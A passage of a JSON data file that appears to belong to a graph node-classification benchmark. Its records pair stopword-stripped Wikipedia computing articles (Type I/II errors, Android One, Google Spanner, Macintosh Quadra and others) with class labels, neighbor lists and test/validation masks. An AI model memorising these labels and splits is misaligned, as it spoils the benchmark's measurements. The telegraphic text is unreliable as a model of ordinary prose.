      3835,
      2814,
      781,
      6926,
      2838,
      5417,
      810,
      2862,
      4400,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      2383,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      6009,
      8058,
      2943,
      392,
      398,
      1428,
      4508,
      8609,
      5028,
      7077,
      9638,
      7086,
      10675,
      3511,
      9155,
      6087,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      499,
      1014,
      3575
    ],
    "mask": "Test"
  },
  {
    "node_id": 7834,
    "label": 4,
    "text": "Type_I_and_type_II_errors:type type ii errors statistical hypothesis testing type error rejection true null hypothesis also known false positive finding conclusion type ii error non-rejection false null hypothesis also known false negative finding conclusion much statistical theory revolves around minimization one errors though complete elimination either treated statistical impossibility statistics null hypothesis statement one seeks nullify conclude incorrect evidence contrary commonly presented statement phenomenon studied produces effect makes difference example null hypothesis might statement diet low carbohydrates effect people weight experimenter usually frames null hypothesis intent rejecting intending run experiment produces data shows phenomenon study indeed make difference case diet low carbohydrates specific time frame fact tend lower body weight people adhere cases specific alternative hypothesis opposed null hypothesis cases alternative hypothesis explicitly stated simply null hypothesis false — either event binary judgment interpretation differs matter significant dispute statistics terms false positives false negatives positive result corresponds rejecting null hypothesis negative result corresponds failing reject null hypothesis false means conclusion drawn incorrect thus type error false positive type ii error false negative comparing two means concluding means different reality different type error concluding means different reality different type ii error various extensions suggested type iii errors though none wide use statistical hypothesis tests probability making type type ii errors example blood tests disease falsely detect disease proportion people fail detect disease proportion people test probability making type error denoted α test probability making type ii error denoted β error rates traded given sample set effort reduce one type error generally results increasing type error given test way reduce error rates increase sample size may feasible test statistic robust type error rate controlled terms also used general way social scientists others refer flaws reasoning statistical test theory notion statistical error integral part hypothesis testing test requires unambiguous statement null hypothesis usually corresponds default state nature example person healthy accused guilty product broken alternative hypothesis negation null hypothesis example person healthy accused guilty product broken result test may negative relative null hypothesis healthy guilty broken positive healthy guilty broken result test corresponds reality correct decision made however result test correspond reality error occurred due statistical nature test result never except rare cases free error two types error distinguished type error type ii error type error occurs null hypothesis h true rejected asserting something absent false hit type error often referred false positive result indicates given condition present actually present terms folk tales investigator may see wolf none raising false alarm null hypothesis h comprises statement wolf type error rate significance level probability rejecting null hypothesis given true denoted greek letter α alpha also called alpha level often significance level set 0.05 5 implying acceptable 5 probability incorrectly rejecting null hypothesis type ii error occurs null hypothesis false erroneously fails rejected failing assert present miss type ii error often called false negative actual hit disregarded test seen miss test checking single condition definitive result true false type ii error committed true alternative hypothesis believed terms folk tales investigator may fail detect wolf fact wolf present therefore fail raise alarm h null hypothesis comprises statement wolf wolf indeed present type ii error part investigator wolf either exists exist within given context— question correctly detected either failing detect present detecting present rate type ii error denoted greek letter β beta related power test equals 1−β tabularised relations truth/falseness null hypothesis outcomes test hypothesis adding water toothpaste protects cavities null hypothesis h adding water make toothpaste effective fighting cavities null hypothesis tested experimental data view nullifying evidence contrary type error occurs detecting effect adding water toothpaste protects cavities present null hypothesis true i.e. true adding water toothpaste make effective protecting cavities null hypothesis rejected based bad experimental data extreme outcome chance alone hypothesis adding fluoride toothpaste protects cavities null hypothesis h adding fluoride toothpaste effect cavities null hypothesis tested experimental data view nullifying evidence contrary type ii error occurs failing detect effect adding fluoride toothpaste protects cavities present null hypothesis false i.e. adding fluoride actually effective cavities data given experiment null hypothesis rejected hypothesis evidence produced court proves man guilty null hypothesis h man innocent type error occurs convicting innocent person miscarriage justice type ii error occurs letting guilty person go free error impunity positive correct outcome occurs convicting guilty person negative correct outcome occurs letting innocent person go free hypothesis patient symptoms improve treatment rapidly placebo treatment null hypothesis h patient symptoms treatment indistinguishable placebo type error would falsely indicate treatment effective placebo whereas type ii error would failure demonstrate treatment effective placebo even though actually effective 1928 jerzy neyman 1894–1981 egon pearson 1895–1980 eminent statisticians discussed problems associated deciding whether particular sample may judged likely randomly drawn certain population florence nightingale david remarked necessary remember adjective 'random term 'random sample apply method drawing sample sample identified two sources error namely 1930 elaborated two sources error remarking 1933 observed problems rarely presented form discriminate certainty true false hypothesis p. 187 also noted deciding whether fail reject reject particular hypothesis amongst set alternative hypotheses p. 201 h h easy make error papers co-written neyman pearson expression h always signifies hypothesis tested paper call two sources error errors type errors type ii respectively standard practice statisticians conduct tests order determine whether speculative hypothesis concerning observed phenomena world inhabitants supported results testing determine whether particular set results agrees reasonably agree speculated hypothesis basis always assumed statistical convention speculated hypothesis wrong so-called null hypothesis observed phenomena simply occur chance consequence speculated agent effect – test determine whether hypothesis right wrong hypothesis test often called null hypothesis likely coined fisher 1935 p. 19 hypothesis either nullified nullified test null hypothesis nullified possible conclude data support alternative hypothesis original speculated one consistent application statisticians neyman pearson convention representing hypothesis tested hypothesis nullified expression h led circumstances many understand term null hypothesis meaning nil hypothesis – statement results question arisen chance necessarily case – key restriction per fisher 1966 null hypothesis must exact free vagueness ambiguity must supply basis 'problem distribution test significance solution consequence experimental science null hypothesis generally statement particular treatment effect observational science difference value particular measured variable experimental prediction probability obtaining result extreme one obtained supposing null hypothesis true lower pre-specified cut-off probability example 5 result said statistically significant null hypothesis rejected british statistician sir ronald aylmer fisher 1890–1962 stressed null hypothesis statistical tests always involve trade-off threshold value varied make test restrictive sensitive restrictive tests increasing risk rejecting true positives sensitive tests increasing risk accepting false positives automated inventory control system rejects high-quality goods consignment commits type error system accepts low-quality goods commits type ii error notions false positives false negatives wide currency realm computers computer applications follows security vulnerabilities important consideration task keeping computer data safe maintaining access data appropriate users context authentication reject positive outcome may counterintuitive experts fields put another way null hypothesis user authorized moulton 1983 stresses importance false positive occurs spam filtering spam blocking techniques wrongly classify legitimate email message spam result interferes delivery anti-spam tactics block filter high percentage unwanted emails without creating significant false-positive results much demanding task false negative occurs spam email detected spam classified non-spam low number false negatives indicator efficiency spam filtering term false positive also used antivirus software wrongly classifies harmless file virus incorrect detection may due heuristics incorrect virus signature database similar problems occur antitrojan antispyware software detection algorithms kinds often create false positives optical character recognition ocr software may detect dots appear algorithm used false positives routinely found every day airport security screening ultimately visual inspection systems installed security alarms intended prevent weapons brought onto aircraft yet often set high sensitivity alarm many times day minor items keys belt buckles loose change mobile phones tacks shoes ratio false positives identifying innocent traveller terrorist true positives detecting would-be terrorist therefore high almost every alarm false positive positive predictive value screening tests low relative cost false results determines likelihood test creators allow events occur cost false negative scenario extremely high detecting bomb brought onto plane could result hundreds deaths whilst cost false positive relatively low reasonably simple inspection appropriate test one low statistical specificity high statistical sensitivity one allows high rate false positives return minimal false negatives biometric matching fingerprint recognition facial recognition iris recognition susceptible type type ii errors null hypothesis input identify someone searched list people system designed rarely match suspects probability type ii errors called false alarm rate hand system used validation acceptance norm far measure system security frr measures user inconvenience level practice medicine significant difference applications screening testing example states usa require newborns screened phenylketonuria hypothyroidism among congenital disorders although display high rate false positives screening tests considered valuable greatly increase likelihood detecting disorders far earlier stage simple blood tests used screen possible blood donors hiv hepatitis significant rate false positives however physicians use much expensive far precise tests determine whether person actually infected either viruses perhaps widely discussed false positives medical screening come breast cancer screening procedure mammography us rate false positive mammograms 15 highest world one consequence high false positive rate us 10-year period half american women screened receive false positive mammogram false positive mammograms costly 100 million spent annually u.s. follow-up testing treatment also cause women unneeded anxiety result high false positive rate us many 90–95 women get positive mammogram condition lowest rate world netherlands 1 lowest rates generally northern europe mammography films read twice high threshold additional testing set high threshold decreases power test ideal population screening test would cheap easy administer produce zero false-negatives possible tests usually produce false-positives subsequently sorted sophisticated expensive testing false negatives false positives significant issues medical testing false negatives may provide falsely reassuring message patients physicians disease absent actually present sometimes leads inappropriate inadequate treatment patient disease common example relying cardiac stress tests detect coronary atherosclerosis even though cardiac stress tests known detect limitations coronary artery blood flow due advanced stenosis false negatives produce serious counter-intuitive problems especially condition searched common test false negative rate 10 used test population true occurrence rate 70 many negatives detected test false false positives also produce serious counter-intuitive problems condition searched rare screening test false positive rate one ten thousand one million samples people true positive positives detected test false probability observed positive result false positive may calculated using bayes theorem",
    "neighbors": [
      5857,
      2244,
      2213,
      4330,
      6643,
      10743,
      10207,
      7739,
      2045,
      2558,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 7835,
    "label": 2,
    "text": "Android_One:android one android one near-stock version android operating system released google android one altered companies make phones runs certain smartphones android one brand promises regular security updates three years android os updates two years android one started google 2014 focusing entry-level devices emerging markets though evolved including mid-range high-end smartphones android one runs 100 phones jon gold head android one partnerships google described program evolution including higher-end devices continuation google nexus program phones vetted google included software allowing years quick updates made companies android one started sundar pichai former product chief current ceo google android one often took least year latest android update arrived non-google devices project targeted indian market low-tier devices pichai said initial set devices shared common hardware based reference platform increasing range devices launched future security system updates handled google first set android one devices featured mediatek quad-core mt6582 mobile system-on-chip mobile soc 2014 android one phones initially rolled india pakistan bangladesh nepal indonesia philippines sri lanka myanmar south asian countries first android one smartphones indian brands micromax spice karbonn september 2014 second generation android one smartphones indonesia brands mito impact evercoss one x nexian journey february 2015 first android one preinstalled android 5.0 lollipop manufacturers including qmobile launched android one device named qmobile a1 july 6 2015 pakistan android one launched nigeria august 2015 infinix hot 2 x510 1 2 gb ram version became first android one africa infinix hot 2 x510 also exported african countries egypt ghana ivory coast morocco kenya cameroon uganda also asian countries united arab emirates pakistan indonesia 2 gb ram version manufactures follow gradually 2016 softbank announced would first carrier japan introduce android one phone country namely sharp 507sh released late july 2016 netherlands italy developed countries android one available market retailer media markt sells turkish smartphone brand general mobile 4g android one devices two countries well turkey since 2017 may 25 2017 turkish smartphone brand general mobile released next addition fully committed portfolio android one phones gm 6 softbank soon followed introducing sharp x1 japan subsidiary telecommunications company mobile june 30 september 5 2017 android one xiaomi jointly announced xiaomi mi a1 first android one device evolved program charter bring users smartphones running unmodified android operating system latest google technology easy use interface regular security os upgrades mi a1 first android one device released globally thirty-six markets sold various online offline distributors including xiaomi ’ mi homes device sales concentrated india indonesia russia taiwan september 2017 mvno google fi introduced first android one device available u.s. android one moto x4 november android one entered german market htc u11 life end november 2017 softbank announced addition four new devices android one lineup mobile x2 htc x3 kyocera s3 sharp s4 kyocera february 2018 hmd global maker nokia smartphones announced joined android one program devices approved google original equipment manufacturers oems agree requirements android one features concerning android operating system os security updates official android one entry page says fine print end confirm exact duration support phones territory smartphone manufacturer monthly security updates supported least three years initial phone release february 22 2018 google blog article says faster access android os updates two years including latest ai innovations google amongst secure devices ecosystem regular security updates three years google play protect built google confirms promise provide 2 years updates android one devices still stands website design impact promise program android one continues expand line smartphones geographic availability oem carrier partnerships countries release likely expand beyond initial countries regions listed snapdragon 410 devices rebrands longcheer l8150 based qualcomm seed reference design explaining similarities direct competitor based fully custom pcb design wileyfox swift available worldwide officially supported wileyfox recent android versions community supported lineageos roms",
    "neighbors": [
      5637,
      11273,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      8237,
      1083,
      10303,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8794,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      673,
      8870,
      1191,
      9913,
      196,
      8907,
      2259,
      8921,
      8413,
      9949,
      1255,
      8940,
      6391,
      5892,
      7428,
      2828,
      2838,
      280,
      10009,
      4890,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      2383,
      3409,
      8019,
      2901,
      5467,
      3940,
      6001,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      410,
      9115,
      2978,
      1959,
      424,
      937,
      5546,
      6057,
      7595,
      9155,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7836,
    "label": 2,
    "text": "Unit_Control_Block:unit control block ibm mainframe operating systems os/360 successors line unit control block ucb memory structure control block describes single input/output peripheral device unit exposure alias operating system certain data within ucb also instructs input/output supervisor ios use certain closed subroutines addition normal ios processing additional physical device control operating systems similar structures initial program load ipl current mvs systems nucleus initialization program nip reads necessary information i/o definition file iodf uses build ucbs ucbs stored system-owned memory extended system queue area esqa ipl completes ucbs owned input/output support information stored ucb device type disk tape printer terminal etc address device 1002 subchannel identifier device number channel path id chpid defines path device devices volume serial number volser large amount information including os job management data contents ucb changed mvs evolved concept representation channel command processor external device inside every ucb representation subchannel information block used ssch assembler instruction put irb input put orb output start chain channel commands known ccws ccws queued onto ucb startio macro interface although reference discuss startio macro macro instruction ibm-supported interface withstanding fact interface remained least past three decades startio interface either start operation immediately channel queue empty queue request channel queue deferred execution deferred execution initiated immediately request head queue device becomes available even another program control instant basic design input/output supervisor ios ucb evolved anchor hold information states device ucb currently five areas used external interface device class extension ucb common extension ucb prefix stub ucb common segment ucb device dependent segment areas internal use information read used determine information device earliest implementations os ucbs foundations extensions assembled sysgen located within first 64 kb system area i/o device lookup table consisted 16-bit q-type i.e relocatable addresses subsequent enhancements allowed extensions 64-kilobyte 65,536 bytes line thereby saving space additional ucb foundations 64-kilobyte line also thereby preserving architecture ucb lookup table converting cuu ucb foundation address ucbs introduced 1960s os/360 device addressed ucb typically moving head hard disk drive tape drive internal cache without device usually grossly outperformed mainframe channel processor hence reason execute multiple input/output operations time would impossible device physically handle 1968 ibm introduced 2305-1 2305-2 fixed-head disks 8 exposures alias addresses per disk os/360 support provided ucb per exposure order permit multiple concurrent channel programs similarly later systems derived os/360 required additional ucb allocated virtual volume 3850 mass storage system mss exposure 3880-11 3880-13 successors originally implemented operating system real way determine waiting i/o less important waiting i/os i/os device handled first first workload manager wlm introduced mvs/esa 5.1 os/390 added smart i/o queuing allowed operating system using information provided wlm systems programmer determine waiting i/os less important waiting i/os wlm would sense move waiting i/o queue device longer busy important waiting i/o would get device next wlm improved i/o response device important work processed however still limit single i/o single ucb/device one time since one set channel commands i/o could run one time fine 1960s cpus slow i/o could processed fast cpus could process systems matured cpu speed greatly surpassed i/o input capacity access device serialized ucb level became serious bottleneck parallel access volume pav allow ucbs clone allow multiple i/o run simultaneously appropriate support dasd hardware pav provides support one i/o single device time maintain backward compatibility operations still serialized ucb level pav allows definition additional ucbs logical device using additional alias address example dasd device base address 1000 could alias addresses 1001 1002 1003 alias addresses would ucb since four ucbs single device four concurrent i/os possible writes extent area disk assigned one contiguous area file still serialized reads writes occur simultaneously first version pav disk controller assigns pav ucb second version pav processing work load manager wlm reassigns pav new ucbs time time third version pav processing ds8000 controller series i/o uses available pav ucb needs net effect pavs decrease iosq time component disk response time often zero restrictions pav number alias addresses 255 per base address overall number devices per logical control unit 256 counting base plus aliases two types pav alias addresses static dynamic static alias address defined dasd hardware z/os refer specific single base address dynamic means number alias addresses assigned specific base address fluctuates based need management dynamic aliases left wlm running goal mode always case supported levels z/os systems implement pav usually mixture pav types one perhaps two static aliases defined base ucb bunch dynamic aliases defined wlm manage sees fit wlm watches i/o activity system wlm determines high-importance workload delayed due high contention specific pav-enabled device specifically disk device base alias ucbs must insufficient eliminate ios queue time high contention wlm estimates would help workload achieve goals readily try move aliases another base address device another problem may certain performance goals met specified wlm service classes wlm look alias ucbs processing work less important tasks service class appropriate wlm re-associate aliases base addresses associated important work wlm actions moving aliases one disk device another take seconds effects seen many situations fast enough hyperpavs much responsive acquire ucb pool duration single i/o operation returning pool delay waiting wlm react hyperpav ucb acquired duration single i/o smaller number ucbs required service workload compared dynamic pavs large z/os images ucbs scarce resource hyperpavs provide relief regard similar concept unix-like systems kernel codice_1 structure addressed combination major minor number device node digital vms operating system uses identically named structure ucb similar purposes ucb created i/o device data ucb includes device unit number part device name listhead pending i/o requests may queued ucb may device-driver defined extension driver keep driver-defined data instantiated device device object i/o subsystem windows nt-family operating systems another similar structure",
    "neighbors": [
      11656,
      7053,
      8976,
      5397,
      663,
      2081,
      8485,
      7983,
      2616,
      11131,
      8393,
      7242,
      10958,
      3669,
      1501,
      868,
      7272,
      10601,
      4586,
      3565,
      10094,
      1911,
      2168,
      3323,
      2172
    ],
    "mask": "None"
  },
  {
    "node_id": 7837,
    "label": 8,
    "text": "Discoverability:discoverability discoverability degree something especially piece content information found search file database information system discoverability concern library information science many aspects digital media software web development marketing since something e.g. website product service etc used people find understand used metadata information information book title product description website keywords affects discoverable something database online 2010s adding metadata product available online make easier end users find product example song file made available online making title name band genre year release pertinent information available connection song file make easier users find song file organizing information putting alphabetical order including search engine example improve discoverability discoverability related different accessibility usability qualities affect usefulness piece information concept discoverability information science online context loose borrowing concept similar name legal profession law discovery pre-trial procedure lawsuit party law civil procedure obtain evidence party parties means discovery devices request answers interrogatories request production documents request admissions depositions discovery obtained non-parties using subpoenas discovery request objected requesting party may seek assistance court filing motion compel discovery usability piece information directly relates discoverable either walled garden database open internet quality information available database internet depends upon quality meta-information item product service case service emphasis placed service reusability opportunities exist reuse service however reuse possible information discoverable first place make items products services discoverable following set activities need performed regarding number 2 storing information searchable repository technically human-searchable repository printed paper list would qualify 2010s searchable repository usually taken mean computer-searchable repository database human user search using type search engine find feature number 3 supports analysis number 2 reading printed paper list hand might feasible theoretical sense time cost-efficient comparison computer-based searching apart increasing reuse potential services discoverability also required avoid development solution logic already contained existing service design services discoverable also provide interpretable information capabilities service discoverability principle provides guidelines could applied service-oriented analysis phase service delivery process relation audiovisual content according meaning given canadian radio-television telecommunications commission crtc purpose 2016 discoverability summit discoverability summed intrinsic ability given content stand lot position easily found discovered piece audiovisual content movie tv series music book ebook audio book podcast audiovisual content digital file tv show movie song made available online content tagged identifying information names key artists e.g. actors directors screenwriters tv shows movies singers musicians record producers songs genres e.g. movies genres action drama comedy songs genres heavy metal music hip hop music etc makes easier end users find content interested 2010s users interact online content algorithms typically determine types content user interested computer program suggests like content user may interested different websites systems different algorithms one approach used amazon online store indicate user user searches looks content/product x users purchased x also purchased following items example oriented around online purchasing behaviour algorithm could also programmed provide suggestions based factors e.g. searching viewing etc. 2010s discoverability typically referred connection search engines highly discoverable piece content e.g. certain movie would movie appears top near top user search results related concept role recommendation engines computer programs give user recommendations based his/her online activity 2010s discoverabilty applies desktop laptop computers increasingly widening range devices access internet including various console video game systems mobile devices tablets smartphones organizations make effort promote certain content e.g. tv show film song video game use traditional marketing billboards tv ads radio ads digital ads pop-up ads pre-roll ads etc mix traditional digital marketing even user ’ intervention searching certain content type content discoverability prime factor contributes whether piece audiovisual content likely found various digital modes content consumption 2017 modes searching include looking netflix movies spotify music audible audio books etc. although concept also generally applied content found twitter tumblr instagram websites involves content ’ mere presence given platform involve associating content keywords tags search algorithms positioning within different categories metadata etc thus discoverability enables much promotes audiovisual content broadcast streamed digital media using internet discoverability includes underlying concepts information science programming architecture foundation search specific product information content within specific webpage software application app discoverability feature content link depends range factors including size colour highlighting features position within page colour used communicate importance feature link designers typically use elements well shadows bolding individuals see certain colours traditional paper printing created physical locations stood fold newspaper versus fold web page app screenview may certain locations give features additional visibility users right bottom web page screen positional advantages disadvantages various locations depend different cultures languages e.g. left right vs. right left locations become established toolbars top screen webpage designers argued commonly used features e.g. print button much visually prominent rarely used features features seen convention user places mouse cursor certain area toolbar function option become visible general smaller screen mobile devices controls often placed right centre screen user views content text organizations try increase discoverability certain feature adding animation moving click icon 2017 addition motion sensors geotracking mobile devices made webpage design discoverability complex smartphones tablets typically capable many inputs user 1980s era desktop including swiping touchscreen touching images screen tilting device one challenges webpage app design degree sophistication experience users navigating webpage app environment varies great deal individuals new using applications one extreme experienced computer users items searched online goal discoverability near top search results organizations may make efforts make likely content webpages top close top search results approaches often collectively called search engine optimization seo note organization takes action increase seo website normally involve changes search engine rather involves adding metadata tags original content among strategies increase visibility website search engine algorithms service delivery context application principle requires collecting information service service analysis phase phase maximum information available service ’ functional context capabilities service stage domain knowledge business experts could also enlisted document meta-data service service-oriented design phase already gathered meta-data could made part service contract oasis soa-rm standard specifies service description artifact represents service meta-data make service meta-data accessible interested parties must centrally accessible could either done publishing service-meta dedicated 'service registry simply placing information 'shared directory case 'service registry repository also used include qos sla current state service basic type meta-information expresses functional context service details product content service ’ capabilities application standardized service contract principle helps create basic functional meta-data consistent manner standardization applied meta-information outside technical contract service e.g publishing information service registry general items data might used categorize may include services know service behavior limitations user service experience information needs documented within service registry way potential consumers use meta-information comparing performance requirements effective application design principle requires meta-information recorded service needs consistent meaningful possible organization-wide standards exist enforce service developers record required meta-data consistent way information recorded meta-data service needs presented way technical non-technical experts understand purpose capabilities service evaluation service may required business people service authorized used principle best applied service-oriented analysis phase time details service ’ purpose functionality available although service design principles support positive manner however case service abstraction service discoverability principle exists inversely proportional relationship details service hidden away service consumers less discoverable information available discovering service could addressed carefully recording service meta-information inner workings service documented within meta-information online economy sophisticated computer programs called algorithms analyse ways end users search access use different content products online thus metadata created regarding content product e.g. author genre e-book also data generated specific human users interaction content organization social media website user profile given person indicating demographic information e.g. age gender location residence employment status education etc social media website collect analyse information tendencies given user given subcategory users social media websites collecting data human users online activities preferences may raise potential privacy concerns algorithms called “ black boxes ” factors used leading websites algorithms typically proprietary information released public number search engine optimization seo firms offer services attempting increase ranking client ’ web content website seo firms typically know exact algorithms used google facebook ghosh et al found algorithm web crawler access 26 new online content ... recrawling constant fraction entire web 2010s one concern raised increasing role algorithms search engines databases specific person indicates preference certain type content product computer algorithm may increasingly focus making recommendations type content give practical example person searches comedy movies online search engine algorithm may start mainly recommending comedies user showing range films e.g. drama documentary etc. positive side person likes comedy films restricted filter reduce information load scanning vast numbers films however various cultural stakeholders raised concerns filter algorithms may restrict diversity material discoverable users concerns dangers filter bubbles raised regards online news services provide types news news sources topics user based his/her previous online activities thus person previously searched fox tv content mainly shown fox tv content person previously searched pbs content shown pbs search results could lead news readers becoming aware certain news source viewpoints search behaviour video content viewers changed great deal since widespread popularity video sharing websites video streaming whereas typical tv show consumer 1980s would read print edition tv guide find shows click channel channel channel surfing see shows appealed 2010s video content consumers increasingly watching screens either smart tvs tablet computer screens smartphones computerized search function often automated algorithm-created suggestions viewer search function user enter name tv show producer actor screenwriter genre help find content interest user searching search engine device laptop tablet computer smartphone device may transmit information user preferences previous online searches website continuing 1980s 2010s comparison 1980s type brand television user watching affect his/her viewing habits however person searching tv shows 2010s different brands computerized smart tvs probably get different search results search term organizations trying get maximal user uptake product content service online discoverability become important goal however achieving discovery automatically translate market success example hypothetical online game xyz easily discoverable function mobile devices video game perform well mobile game market despite top search results well even product functions runs plays properly well users may like product case user like certain online product service discoverability repeatable user find product service subsequent search may longer look product/service instead shift substitute easily reliably findable enough make online product service discoverable short period unless goal create “ viral ” content part short-term marketing campaign",
    "neighbors": [
      9734,
      113,
      2901,
      1083,
      8639
    ],
    "mask": "Test"
  },
  {
    "node_id": 7838,
    "label": 8,
    "text": "Application_Request_Routing:application request routing application request routing arr extension internet information server iis enables iis server function load balancer arr iis server configured route incoming requests one multiple web servers using one several routing algorithms load balancing requests high availability web servers achieved without incurring typically-high costs dedicated load balancing products arr currently available version 3.0 released july 26 2013 current version supported x86 x64 installed iis 7.0 later windows 2008 later arr available download microsoft download center via microsoft web platform installer webpi arr requires url rewrite extension function uses routing requests arr configured redirect traffic based server variables urls cookies performs full layer 7 load balancing arr functionality described load balancing reverse proxy although advanced dedicated reverse proxy products microsoft uag dedicated load balancing solutions arr 3.0 supports following features",
    "neighbors": [
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      10281,
      2101,
      8757,
      10812,
      3648,
      7754,
      10828,
      4173,
      4174,
      9808,
      10839,
      603,
      9819,
      3170,
      10338,
      617,
      9834,
      622,
      9839,
      4210,
      7796,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      9377,
      3235,
      4771,
      6820,
      1703,
      6827,
      5300,
      2749,
      4289,
      200,
      9420,
      10957,
      6869,
      2782,
      225,
      9442,
      4836,
      4326,
      2279,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      4356,
      11524,
      782,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      7970,
      5413,
      1832,
      3881,
      10024,
      10026,
      10029,
      7983,
      3890,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      9033,
      6990,
      3922,
      11605,
      4439,
      5465,
      11103,
      2402,
      4458,
      6506,
      9593,
      2943,
      1418,
      5003,
      5004,
      1935,
      11677,
      929,
      11683,
      430,
      6062,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      4051,
      8659,
      11221,
      1498,
      5594,
      478,
      6114,
      6115,
      8681,
      6637,
      9709,
      11248,
      6641,
      499,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7839,
    "label": 0,
    "text": "Machine-readable_dictionary:machine-readable dictionary machine-readable dictionary mrd dictionary stored machine computer data instead printed paper electronic dictionary lexical database machine-readable dictionary dictionary electronic form loaded database queried via application software may single language explanatory dictionary multi-language dictionary support translations two languages combination translation software multiple languages usually apply bidirectional dictionaries mrd may dictionary proprietary structure queried dedicated software example online via internet dictionary open structure available loading computer databases thus used via various software applications conventional dictionaries contain lemma various descriptions machine-readable dictionary may additional capabilities therefore sometimes called smart dictionary example smart dictionary open source gellish english dictionary term dictionary also used refer electronic vocabulary lexicon used example spelling checkers dictionaries arranged subtype-supertype hierarchy concepts terms called taxonomy also contains relations concepts called ontology search engines may use either vocabulary taxonomy ontology optimise search results specialised electronic dictionaries morphological dictionaries syntactic dictionaries term mrd often contrasted nlp dictionary sense mrd electronic form dictionary printed paper although used programs contrast term nlp dictionary preferred dictionary built scratch nlp mind iso standard mrd nlp able represent structures called lexical markup framework first widely distributed mrds merriam-webster seventh collegiate w7 merriam-webster new pocket dictionary mpd produced government-funded project system development corporation direction john olney manually keyboarded typesetting tapes either book available originally distributed multiple reels magnetic tape card images separate word definition separate punch card numerous special codes indicating details usage printed dictionary olney outlined grand plan analysis definitions dictionary project expired analysis could carried robert amsler university texas austin resumed analysis completed taxonomic description pocket dictionary national science foundation funding however project expired taxonomic data could distributed roy byrd et al ibm yorktown heights resumed analysis webster seventh collegiate following amsler work finally 1980s starting initial support bellcore later funded various u.s. federal agencies including nsf arda darpa dto reflex george armitage miller christiane fellbaum princeton university completed creation wide distribution dictionary taxonomy wordnet project today stands widely distributed computational lexicology resource",
    "neighbors": [
      416,
      6145,
      874,
      396,
      2414,
      11056,
      10519,
      538
    ],
    "mask": "None"
  },
  {
    "node_id": 7840,
    "label": 2,
    "text": "WinBuilder:winbuilder winbuilder free application designed build customize boot disks live cds based microsoft windows winpe scripts building blocks live cd compiled winbuilder used build core components live cd adding applications configuration specific project scripts consist human-readable text file .script extension contain winbuilder scripting commands scripts graphical user interface sometimes encoded applications extracted needed project collection winbuilder scripts maintained building complete live cd project contains multiple scripts responsible adding features applications build users may build projects scratch use one many projects actively developed boot-land community projects downloaded directly using winbuilder built-in download manager used as-is customized meet individual needs projects developed distributed freely aim provide alternative popular live cd distributions based linux knoppix slax damn small linux known use rescue administrative actions pcs use software build various customized boot disks covered articles pc quest german edition pc world also offers customized scripts building disk images including additional utilities branded pcwvistape pcwwin7pe russian edition chip terabyte unlimited cnet editor review found winbuilder one easy-to-use boot disk creation tools genre praised novice-friendly interface time warned program expects experienced users part boot disk applications experts built-in download center remarked simplifies procuring boot disk applications features praised small size fair memory overhead simple instructions robust application installation wizards",
    "neighbors": [
      9693,
      9377,
      6371,
      6436,
      5380,
      8837,
      6797,
      7983,
      10896,
      9780,
      9910,
      4637,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 7841,
    "label": 1,
    "text": "Spanner_(database):spanner database spanner google newsql database spanner globally distributed database service gives developers production-ready storage solution provides key features global transactions strongly consistent reads automatic multi-site replication failover spanner stores large amounts mutable structured data spanner allows users perform arbitrary queries using sql relational data maintaining strong consistency high availability data synchronous replication key features spanner spanner joined google platform february 2017 available part google cloud platform spanner uses paxos algorithm part operation shard partition data across hundreds servers makes heavy use hardware-assisted clock synchronization using gps clocks atomic clocks ensure global consistency google f1 sql database management system dbms built top spanner replacing google custom mysql variant",
    "neighbors": [
      4995,
      5892,
      7816,
      6156,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      1203,
      11317,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      7499,
      11343,
      3664,
      3795,
      1240,
      8413,
      6367,
      2658,
      6632,
      5483,
      236,
      7022,
      9712,
      9970,
      2163,
      8821,
      1142,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 7842,
    "label": 3,
    "text": "Macintosh_Quadra:macintosh quadra macintosh quadra family personal computers designed manufactured sold apple computer inc. october 1991 october 1995 quadra named motorola 68040 central processing unit replaced macintosh ii family high-end macintosh model first models quadra 700 quadra 900 introduced october 1991 quadra 800 840av 605 added 1993 macintosh centris line merged quadra october 1993 adding 610 650 660av range introduction power macintosh line early 1994 apple continued produce sell new quadra models 950 continued sold october 1995 product manager quadra family frank casanova also product manager macintosh iifx first computers bearing macintosh quadra name quadra 700 quadra 900 introduced 1991 central processing unit cpu speed 25 mhz 700 compact model using case dimensions macintosh iici processor direct slot pds expansion slot latter newly designed tower case five nubus expansion slots one pds slot 900 replaced 1992 quadra 950 cpu speed 33 mhz line joined number 800-series machines new minitower case design starting quadra 800 600-series pizza box desktop cases quadra 610 1993 quadra 840av 660av introduced 40 mhz 25 mhz respectively included digital signal processor s-video composite video input/output ports well cd-quality microphone audio output ports av models also introduced plaintalk consisting text-to-speech software macintalk pro speech control although dictation however features poorly supported software dsp installed later av macs based more-powerful powerpc 601 cpu powerful enough handle coprocessor duties apple hired marketing firm lexicon branding come name lexicon chose name quadra hoping appeal engineers evoking technical terms like quadrant quadriceps quadra name also used successors centris models briefly existed 1993 610 650 660av centris mid-range line systems quadra high end lc low end later decided many product lines name dropped 